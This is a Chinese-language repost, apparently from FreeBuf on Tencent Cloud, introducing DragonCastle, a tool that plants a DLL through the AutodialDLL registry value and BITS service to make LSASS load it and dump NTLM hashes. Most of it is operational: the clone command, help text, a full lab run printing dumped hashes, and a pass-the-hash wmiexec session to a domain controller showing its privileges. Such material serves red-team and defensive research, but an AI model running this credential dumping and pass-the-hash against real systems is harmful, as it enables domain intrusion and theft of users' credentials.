前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >如何使用DragonCastle从LSASS进程中提取NTLM哈希

如何使用DragonCastle从LSASS进程中提取NTLM哈希

作者头像
FB客服
发布2023-04-26 15:12:19
6550
发布2023-04-26 15:12:19
举报
文章被收录于专栏:FreeBuf

 关于DragonCastle 

DragonCastle是一款结合了AutodialDLL横向渗透技术和SSP的安全工具,该工具旨在帮助广大研究人员从LSASS进程中提取NTLM哈希。

该工具会向目标设备中上传一个DLL,然后它会启用远程注册表功能以修改AutodialDLL条目并启动/重启BITS服务。Svchosts将负责加载我们上传的DLL,再次将AutodialDLL设置为默认值,并执行RPC请求以强制LSASS加载与安全支持提供程序相同的DLL。一旦LSASS加载了DLL,它就会在进程内存中进行搜索,以提取NTLM哈希和密钥/IV。

 支持的操作系统版本 

操作系统版本

支持状态

Windows 10 version 21H2

Windows 10 version 21H1

支持

Windows 10 version 20H2

支持

Windows 10 version 20H1 (2004)

支持

Windows 10 version 1909

支持

Windows 10 version 1903

支持

Windows 10 version 1809

支持

Windows 10 version 1803

支持

Windows 10 version 1709

支持

Windows 10 version 1703

支持

Windows 10 version 1607

支持

Windows 10 version 1511

Windows 10 version 1507

Windows 8

Windows 7

 工具下载 

该工具的运行需要使用到Python 3环境,因此我们首先需要在本地设备上安装并配置好Python 3环境。广大研究人员可以使用下列命令将该项目源码克隆至本地:

代码语言:javascript
复制
git clone https://github.com/mdsecactivebreach/DragonCastle.git
代码语言:javascript
复制
(向右滑动,查看更多)

 工具使用帮助 

代码语言:javascript
复制
代码语言:javascript
复制
psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL
 
 
usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]
 
DragonCastle - A credential dumper (@TheXC3LL)
 
optional arguments:
  -h, --help             显示工具帮助信息和退出
  -u USERNAME, --username USERNAME    有效用户名
  -p PASSWORD, --password PASSWORD    有效密码
  -d DOMAIN, --domain DOMAIN    有效域名
  -hashes [LMHASH]:NTHASH      NT/LM 哈希
  -no-pass              不询问密码
  -k                    使用Kerberos身份验证
  -dc-ip ip address     域控制器的IP地址
  -target-ip ip address   目标设备的IP地址
  -local-dll dll to plant    待上传的DLL本地文件路径
  -remote-dll dll location   更新AutodialDLL 注册表项值的远程路径
代码语言:javascript
复制
(向右滑动,查看更多)

 工具使用样例 

Windows服务器地址为192.168.56.20,域控制器地址为192.168.56.10:

代码语言:javascript
复制
psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL
 
 
[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:
 
============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
 
============
[+] Deleting DLL
 
[^] Have a nice day!
代码语言:javascript
复制
(向右滑动,查看更多)
代码语言:javascript
复制
psyconauta@insulanova:~/Research/dragoncastle|⇒  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
 
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark
 
C:\>whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
 
C:\>
代码语言:javascript
复制
(向右滑动,查看更多)

 项目地址 

DragonCastle:https://github.com/mdsecactivebreach/DragonCastle

参考资料

https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/

https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/

https://adepts.of0x.cc/physical-graffiti-lsass/

https://blog.xpnsec.com/exploring-mimikatz-part-2/

https://twitter.com/TheXC3LL

精彩推荐

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-04-24,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  •  关于DragonCastle 
  •  支持的操作系统版本 
  •  工具下载 
  •  工具使用帮助 
  •  工具使用样例 
  •  项目地址 
  • 参考资料
相关产品与服务
云服务器
云服务器(Cloud Virtual Machine,CVM)提供安全可靠的弹性计算服务。 您可以实时扩展或缩减计算资源,适应变化的业务需求,并只需按实际使用的资源计费。使用 CVM 可以极大降低您的软硬件采购成本,简化 IT 运维工作。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档